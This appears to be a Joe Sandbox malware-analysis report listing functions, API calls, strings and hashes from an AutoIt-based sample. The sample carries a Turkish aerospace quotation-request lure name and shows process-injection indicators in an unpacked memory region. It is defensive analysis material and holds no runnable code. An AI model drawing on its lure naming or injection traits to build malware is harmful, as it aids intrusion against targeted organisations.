Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: BuffCharUpper
String ID: p#%
API String ID: 3964851224-1578963556
Opcode ID: cb774f125fe0c331c95f811b49160543b53d701e8c39530d11ec4d13b95c10e6
Instruction ID: 7a6e78ce650ce530eeba99effd4406ed08895f3a0098db782e298caeea093667
Opcode Fuzzy Hash: cb774f125fe0c331c95f811b49160543b53d701e8c39530d11ec4d13b95c10e6
Instruction Fuzzy Hash: 3BA25B70A083019FD715DF28C480B2AB7E1BF99304F15896EE99A8B352D771ED45CFA2

Function 0018D730 Relevance: 21.6, APIs: 14, Instructions: 618windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 0018D807
timeGetTime.WINMM ref: 0018DA07
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0018DB28
TranslateMessage.USER32(?), ref: 0018DB7B
DispatchMessageW.USER32(?), ref: 0018DB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0018DB9F
Sleep.KERNEL32(0000000A), ref: 0018DBB1

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: 35c5b4baed98b52dd2aaaf648aa3d0c7890722f5bf693e994334a46d846663bf
Instruction ID: 56247fedbfc85db46c83edb8cee9096fe04314826973270550e1893690d7858f
Opcode Fuzzy Hash: 35c5b4baed98b52dd2aaaf648aa3d0c7890722f5bf693e994334a46d846663bf
Instruction Fuzzy Hash: 6842CF30608341EFD728EF24E888BAAB7E1BF66314F55855AE465873D1D770EA44CF82

Function 00182CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00182D07
RegisterClassExW.USER32(00000030), ref: 00182D31
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00182D42
InitCommonControlsEx.COMCTL32(?), ref: 00182D5F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00182D6F
LoadIconW.USER32(000000A9), ref: 00182D85
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00182D94

Strings

+, xrefs: 00182CF0
AutoIt v3 GUI, xrefs: 00182D23
0, xrefs: 00182CE9
TaskbarCreated, xrefs: 00182D37

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 7904067e0a3f43d88552629b8b0afc15ff1451d5b791eb458ed9ac80d4d683c9
Instruction ID: 7d928273823ff12d29665c6daeff736462339eedf7fa093bb2999fe7d632886d
Opcode Fuzzy Hash: 7904067e0a3f43d88552629b8b0afc15ff1451d5b791eb458ed9ac80d4d683c9
Instruction Fuzzy Hash: 1421C3B9991318AFDB00DFA4F84DBEDBBB8FB18701F10811AF511A62A0DBB14554CF95

Function 001C065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001C039A: CreateFileW.KERNELBASE(00000000,00000000,?,001C0704,?,?,00000000,?,001C0704,00000000,0000000C), ref: 001C03B7

GetLastError.KERNEL32 ref: 001C076F
__dosmaperr.LIBCMT ref: 001C0776
GetFileType.KERNELBASE(00000000), ref: 001C0782
GetLastError.KERNEL32 ref: 001C078C
__dosmaperr.LIBCMT ref: 001C0795
CloseHandle.KERNEL32(00000000), ref: 001C07B5
CloseHandle.KERNEL32(?), ref: 001C08FF
GetLastError.KERNEL32 ref: 001C0931
__dosmaperr.LIBCMT ref: 001C0938

Strings

H, xrefs: 001C08BD

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 4f5c80816de6cfe6a5f55cbd4e3542f74a79bb8f584a5a5acbb1db9813c54f40
Instruction ID: 22829b52e981022966645ad59624b27959c15ac7e10eb6b5075344533a346a07
Opcode Fuzzy Hash: 4f5c80816de6cfe6a5f55cbd4e3542f74a79bb8f584a5a5acbb1db9813c54f40
Instruction Fuzzy Hash: 2EA13836A00254CFDF1AAF68DC95BAE7BA0AB2A320F14415DF8159B291DB31DD12CB91

Function 0018344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00183A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00251418,?,00182E7F,?,?,?,00000000), ref: 00183A78

Part of subcall function 00183357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00183379

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0018356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 001C318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 001C31CE
RegCloseKey.ADVAPI32(?), ref: 001C3210
_wcslen.LIBCMT ref: 001C3277
_wcslen.LIBCMT ref: 001C3286

Strings

Software\AutoIt v3\AutoIt, xrefs: 00183560
Include, xrefs: 001C3184, 001C31C5
\Include\, xrefs: 00183527
\, xrefs: 001C328C

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: 5ef4d1303c2ee515b3e864c4ef85e1c49fc617e9f84e14f48f9e52f51b599525
Instruction ID: 749153e68bb5ae998a8e17e54eac92efc47ef26f46047da676c8f0b3b7acd29c
Opcode Fuzzy Hash: 5ef4d1303c2ee515b3e864c4ef85e1c49fc617e9f84e14f48f9e52f51b599525
Instruction Fuzzy Hash: 44718D71408301EFC704EF65EC869ABBBE8FFAA740F50446EF455971A0EB309A48CB56

Function 00182B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00182B8E
LoadCursorW.USER32(00000000,00007F00), ref: 00182B9D
LoadIconW.USER32(00000063), ref: 00182BB3
LoadIconW.USER32(000000A4), ref: 00182BC5
LoadIconW.USER32(000000A2), ref: 00182BD7
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00182BEF
RegisterClassExW.USER32(?), ref: 00182C40

Part of subcall function 00182CD4: GetSysColorBrush.USER32(0000000F), ref: 00182D07
Part of subcall function 00182CD4: RegisterClassExW.USER32(00000030), ref: 00182D31
Part of subcall function 00182CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00182D42
Part of subcall function 00182CD4: InitCommonControlsEx.COMCTL32(?), ref: 00182D5F
Part of subcall function 00182CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00182D6F
Part of subcall function 00182CD4: LoadIconW.USER32(000000A9), ref: 00182D85
Part of subcall function 00182CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00182D94

Strings

0, xrefs: 00182C0F
AutoIt v3, xrefs: 00182C2F
#, xrefs: 00182C16

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 0ecb30c4fe42388e855d31211f22df3a4acf6a4087512f836ef4fad8930feb4f
Instruction ID: 7ffa6b085de5f43a68578f41ba0679e355d9d8ab6df9a20ed5990d62f169125b
Opcode Fuzzy Hash: 0ecb30c4fe42388e855d31211f22df3a4acf6a4087512f836ef4fad8930feb4f
Instruction Fuzzy Hash: 9F214F74E40314BBDB109F95FC6DBAABFB4FB08B51F14419AF500A66A0D7B10960CF98

Function 00183170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0018316A,?,?), ref: 001831D8
KillTimer.USER32(?,00000001,?,?,?,?,?,0018316A,?,?), ref: 00183204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00183227
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0018316A,?,?), ref: 00183232
CreatePopupMenu.USER32 ref: 00183246
PostQuitMessage.USER32(00000000), ref: 00183267

Strings

TaskbarCreated, xrefs: 0018322D

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: b914263bdc09815788c016ff7563ceca6abb21797c8ac656e5d2f4098f5f0131
Instruction ID: 97f8f43803be92239aa2a6e560621ca8359a41c99ea358376c102c5a16605113
Opcode Fuzzy Hash: b914263bdc09815788c016ff7563ceca6abb21797c8ac656e5d2f4098f5f0131
Instruction Fuzzy Hash: 82412939250304B7DB183B78AC1DBBD3A1AE725F01F1C4129F922862E1DBB1DB519F65

Function 0018DFD0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON

Download Yara Rule

Strings

D%%, xrefs: 001D302D
D%%, xrefs: 0018E4B1
D%%, xrefs: 0018E1E0
D%%D%%, xrefs: 0018E27E
D%%, xrefs: 001D2FDA
Variable must be of type 'Object'., xrefs: 001D32B7

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID: D%%$D%%$D%%$D%%$D%%D%%$Variable must be of type 'Object'.
API String ID: 0-3578055194
Opcode ID: 522562a127317f4e95e4d2ce102ac0937332783929e6dc51818e138adf7a41d8
Instruction ID: 39b60fc947e51d3b2e0d66d8bbb68c430e4f83aa97f92571fed9b995f525810e
Opcode Fuzzy Hash: 522562a127317f4e95e4d2ce102ac0937332783929e6dc51818e138adf7a41d8
Instruction Fuzzy Hash: B0C28A71A00205DFCB24EF98C884AADB7F1BF19310F25856AE916AB391D375EE41CF91

Function 001B8D45 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6a7472c552cadfa919779b8d792b95b503247e7616fa6f01cbc7897fb2f86a9
Instruction ID: e162a0a3fa98ded364c15e60ea0c2588a42fe943e6ae680b99dee1c16198b55f
Opcode Fuzzy Hash: b6a7472c552cadfa919779b8d792b95b503247e7616fa6f01cbc7897fb2f86a9
Instruction Fuzzy Hash: E3C1D374904349AFDB11EFE8D885BEDBBB8AF19310F144199F919A7392CB309942CB61

Function 018A0D98 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 018A0E69
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 018A108F

Memory Dump Source

Source File: 00000000.00000002.1456313180.000000000189E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0189E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_189e000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
Instruction ID: aadab0157dd1b30fa376d309bd8f625d5117f3b36dfe8588c8dae01741b4d55a
Opcode Fuzzy Hash: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
Instruction Fuzzy Hash: FFA12B70E00209EBEB14CFA4C998BEEBBB5FF48705F508159E611BB281D7759A80CF51

Function 00182C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00182C91
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00182CB2
ShowWindow.USER32(00000000,?,?,?,?,?,?,00181CAD,?), ref: 00182CC6
ShowWindow.USER32(00000000,?,?,?,?,?,?,00181CAD,?), ref: 00182CCF

Strings

edit, xrefs: 00182CAC
AutoIt v3, xrefs: 00182C89, 00182C8E, 00182C8F

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 4036a1199a05087fa7f9530c9834e26f10dc6f8cf6b827b2404568043fd6f904
Instruction ID: 119539880ede92443bfda192423c94b6778ce302c61fee4dc3cc4d27e90b6d44
Opcode Fuzzy Hash: 4036a1199a05087fa7f9530c9834e26f10dc6f8cf6b827b2404568043fd6f904
Instruction Fuzzy Hash: E6F03A795803907AEB300713BC1CFB76EBDD7D6F61F11409AF900A21B0C6710861DAB8

Function 018A0B88 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 136
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 018A0A78: Sleep.KERNELBASE(000001F4), ref: 018A0A89

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 018A0C84

Strings

K7H3K4M4QE94QO5YC2, xrefs: 018A0CE7, 018A0CEA

Memory Dump Source

Source File: 00000000.00000002.1456313180.000000000189E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0189E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_189e000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: CreateFileSleep
String ID: K7H3K4M4QE94QO5YC2
API String ID: 2694422964-3904854718
Opcode ID: 387a74b5aa3291fabe28d2796e7e4eb3a43b7f08d13cf23704fa8aca1cedcb40
Instruction ID: 8ab1fea683d84b11c0dd189fc22a24836582e19147c167934bc9a98555e126ed
Opcode Fuzzy Hash: 387a74b5aa3291fabe28d2796e7e4eb3a43b7f08d13cf23704fa8aca1cedcb40
Instruction Fuzzy Hash: 8451B431D0424DDBEF11DBA8C808BEEBBB8AF15304F404599E609BB2C1D7B91B45CBA1

Function 001F2947 Relevance: 7.8, APIs: 5, Instructions: 313
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001F2C05
DeleteFileW.KERNEL32(?), ref: 001F2C87
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 001F2C9D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001F2CAE
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001F2CC0

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: 9a506eef0bf7ad9471a0eef1d47744a9ec5e13a4a70ba625bb6fdb98f88464f2
Instruction ID: 5e45aa85175e8c743961c0215c2fe96d3f2d2be8d3a0610ef4d5e90c9af25838
Opcode Fuzzy Hash: 9a506eef0bf7ad9471a0eef1d47744a9ec5e13a4a70ba625bb6fdb98f88464f2
Instruction Fuzzy Hash: 28B11C71D0011DABDF25EBA4CC85EEEBBBDEF59350F1040A6FA09E6151EB309A448F61

Function 00183B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00183B0F,SwapMouseButtons,00000004,?), ref: 00183B40
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00183B0F,SwapMouseButtons,00000004,?), ref: 00183B61
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00183B0F,SwapMouseButtons,00000004,?), ref: 00183B83

Strings

Control Panel\Mouse, xrefs: 00183B3E

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 692a6d112406b7f5f37abffb1b2967b50bb5a90e882164af1bc0b1b6e704b856
Instruction ID: c26bd1436088277328bfaafd95c657990ef857af99b7334ff58f3c336e8cb523
Opcode Fuzzy Hash: 692a6d112406b7f5f37abffb1b2967b50bb5a90e882164af1bc0b1b6e704b856
Instruction Fuzzy Hash: 76112AB5510208FFDB21DFA5DC48AEEB7B8EF04B84B148459A815D7210E7319F409B60

Function 0189FA78 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 018A02A5
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 018A02C9
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 018A02EB

Memory Dump Source

Source File: 00000000.00000002.1456313180.000000000189E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0189E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_189e000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: dbcdd5886b880b5c161ff2c694cfceffc24b8721b5d78ef826e157d7e74dbfef
Instruction ID: 653772fb99a07464df47ceb48620f5f46ef3c4ec934042c2fe2ddf5df1b2a3a2
Opcode Fuzzy Hash: dbcdd5886b880b5c161ff2c694cfceffc24b8721b5d78ef826e157d7e74dbfef
Instruction Fuzzy Hash: 75620A30A142589BEB24CFA4C850BDEB772FF58304F5091A9E20DEB394E7759E81CB59

Function 00182DE3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 001C2C8C

Part of subcall function 00183AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00183A97,?,?,00182E7F,?,?,?,00000000), ref: 00183AC2

Part of subcall function 00182DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00182DC4

Strings

`e$, xrefs: 001C2C85
X, xrefs: 001C2C5A

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X$`e$
API String ID: 779396738-2370829165
Opcode ID: 2f4fca66ca1d1cb471623c330520e40881f8dc2f0ab5e9f5658a69a0517197aa
Instruction ID: b416d81d999e363d0eba836587a778befe9fc94c6fca6655fb539c3304481194
Opcode Fuzzy Hash: 2f4fca66ca1d1cb471623c330520e40881f8dc2f0ab5e9f5658a69a0517197aa
Instruction Fuzzy Hash: 0C21E770A102589FCF05EF94D809BEE7BFCAF59714F008059E405F7241DBB49A498F61

Function 0019FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 001A0668

Part of subcall function 001A32A4: RaiseException.KERNEL32(?,?,?,001A068A,?,00251444,?,?,?,?,?,?,001A068A,00181129,00248738,00181129), ref: 001A3304

__CxxThrowException@8.LIBVCRUNTIME ref: 001A0685

Strings

Unknown exception, xrefs: 001A0692

Memory Dump Source

